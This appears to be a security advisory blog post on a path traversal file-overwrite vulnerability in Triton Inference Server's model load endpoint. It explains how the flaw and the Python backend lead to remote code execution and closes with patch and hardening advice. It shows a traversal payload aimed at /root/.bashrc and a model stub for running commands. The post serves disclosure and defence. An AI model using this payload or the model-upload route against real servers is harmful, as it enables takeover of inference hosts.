What You Need To Know

  • Remote Code Execution is possible in nonstandard deployments of Triton Inference Server
  • Patches and security testing tools are available now

Read more below.

What Are Inference Servers? 

Inference servers are essential tools in making trained machine learning models accessible for practical use. These servers act as a bridge between the machine learning models and their end-users. Here’s how they fit into the machine learning lifecycle: 

  1. Training and Deployment: Initially, an individual or organization develops and trains a machine learning model for a specific purpose, such as predicting housing prices in a particular area. Once the model is trained, it is deployed onto an inference server. 
  2. Function of Inference Servers: An inference server is, in essence, a specialized API server. It allows for the input of data to be analyzed by the model. After processing this data, the model generates and sends back relevant outputs or predictions to the user. 

From a security perspective, inference servers are often the most exposed elements in a machine learning pipeline. Due to the exposure and direct access to the machine learning models, they are valuable targets for attackers. 

One of the most popular inference servers in the world is the open source Triton Inference Server. It is optimized for cloud and edge deployments, and is offered by all major cloud providers as a standard way of deploying machine learning models to end-users. 

Vulnerability Discovery 

On September 20th, 2023 a member of the huntr community, l1k3beef, reported an issue in Triton where a file traversal vulnerability lead to the ability to overwrite any file on the server when Triton is run using a non-default configuration option. 

While the initial proof of concept in the report was failing, we felt it fit the pattern of vulnerabilities we’ve found and seen in the past. After some further experimentation we, at Protect AI, were able to trigger the reported vulnerability with some minor changes to the original proof of concept from l1k3beef

Arbitrary file overwrites can often lead to remote code execution allowing attackers to completely control the server. Code execution can be acquired through arbitrary file overwrites through paths such as overwriting the SSH keys with the attacker’s keys, or overwriting the .bashrc file with malicious code that will execute the next time a user logs into the system. These kinds of exploitation paths require an extra step such as having an SSH server running.

Vulnerability Details 

The Triton Inference Server exposes both HTTP/REST and GRPC API endpoints based on KFServing standard inference protocols that have been proposed by the KFServing project. Triton also implements a number of HTTP/REST and GRPC extensions to the KFServing inference protocol. The HTTP/REST and GRPC protocols provide endpoints to check server and model health, metadata and statistics. Additional endpoints allow model loading/unloading, and inference. 

The discovered vulnerability lies in the API of one of these extensions, specifically the Model Repository Extension. When Triton is started with Dynamic Model Loading enabled via the non-default --model-control-mode explicit CLI argument, Triton becomes vulnerable to an arbitrary file overwrite attack. Prior to version 2.40 (NGC container 23.11), an attacker could craft an HTTP POST request to /v2/repository/models/<model_name>/load and payload the file: JSON key with a path traversal such as the one seen below. 

"parameters": { 

"config": "{}", 

"file:../../root/.bashrc": "BASE64_ENCODED_FILE_CONTENTS" } 

File overwrite primitives are powerful vulnerabilities. In the context of Triton, one can silently replace running models with slightly different ones, or simply bring down the entire service by overwriting system files. Remote code execution is also possible by overwriting a user’s .profile or .bashrc files with, for example, a Python reverse shell which would execute the next time a user logs into the system. 

Expanding the Attack 

Protect AI’s Threat Research team wanted to see if it was possible to turn this file write primitive into a direct remote code execution vulnerability, without the requirement of a user to log into the system to trigger the malicious code. Initially, the plan was to use this vulnerability to write a pickle model to the server that had malicious code injected into it then load the model triggering the code execution. However, after some research it was found Triton has the concept of backends:

“A Triton backend is the implementation that executes a model. A backend can be a wrapper around a deep-learning framework, like PyTorch, TensorFlow, TensorRT or ONNX Runtime. Or a backend can be custom C/C++ logic performing any operation (for example, image pre-processing)... ”1 

The Python backend caught our attention: 

“The Python backend allows you to write your model logic in Python. For example, you can use this backend to execute pre/post processing code written in Python …” 

It dawned on us that we could potentially use this feature to get RCE by using the arbitrary file write vulnerability: 

  1. Write a Triton model configuration file that specifies the Python backend 2. Write a Python script to execute a command that would spawn a reverse shell. 

To tell Triton what backend to use for a specific model, all you have to do is specify it in the model’s config file (config.pbtxt). Below is an example model config file using the Python backend: 

name: "mymodel" 

backend: "python" 

input [ 

name: "input__0" 

data_type: TYPE_FP32 

dims: [ -1, 3 ] 

...SNIP... 

With the Python backend, your “model” is simply a Python file which has to contain a class named TritonPythonModel, with three specific methods: 

https://github.com/triton-inference-server/backend

 

 

Python 

class TritonPythonModel: 

def initialize(self, args): 

# Your code here 

return 

def execute(self, requests): 

# Your code here 

return 

def finalize(self): 

# Your code here 

return 

By putting some code under the initialize method to execute an operating system command, and instructing Triton to load the model, we can achieve remote code execution. 

Metasploit Module 

While we searched for the easiest way to turn the file overwrite into direct remote code execution without user interaction we realized that creating a model.py file with malicious code didn’t require the file overwrite vulnerability at all. When –-model-mode explicit is used in Triton the load endpoint itself is capable of remotely uploading a malicious model by design. With that in mind, Protect AI’s threat research team created a Metasploit module to help security professionals test their Triton deployment. It gives the user two options to acquire a remote shell. 

First, a fileless in-memory remote shell is available with the module’s default options via the builtin functionality of the load endpoint that is exposed when Triton is started with the argument –-model-mode explicit. This method of acquiring a shell works with the latest version of Triton, as of the time of writing, because it abuses a feature of Triton rather than a vulnerability. 

Second, the module contains an option for the user to store their payload to disk by utilizing the file overwrite vulnerability. This method of acquiring a shell was patched in the latest version of Triton: 23.12.

Proof of concept code to test your own Triton deployments for the vulnerability are available in a GitHub repository managed by ProtectAI. 

Mitigation 

  1. Upgrade to Triton version 2.40 (NGC container 23.11) or above 
  2. This prevents the file overwrite vulnerability, however, if you enable Dynamic Model Loading with the --model-control-mode explicit argument remote code execution is still possible by virtue of design. 
  3. Follow Triton’s Secure Deployment Guide documentation which was released as a response to these findings. 
  4. Do not start Triton with the --model-control-mode explicit CLI argument in production. Audit existing production deployments to determine if this flag is enabled. 4. If you require the --model-control-mode explicit flag in production, you may be able to mitigate remote code execution risks by removing the Python backend from Triton, and customizing Triton to prevent it from loading models stored in formats that allow for deserialization attacks such as pickle. 

Maintainer Response 

The Triton Inference Server maintainers were quick to respond and fix the file overwrite vulnerability. A Secure Deployment Guide was written to inform users of the inherent risks in using the --model-control-mode explicit argument. Additionally, a Security Bulletin  was posted informing users of the issues outlined above.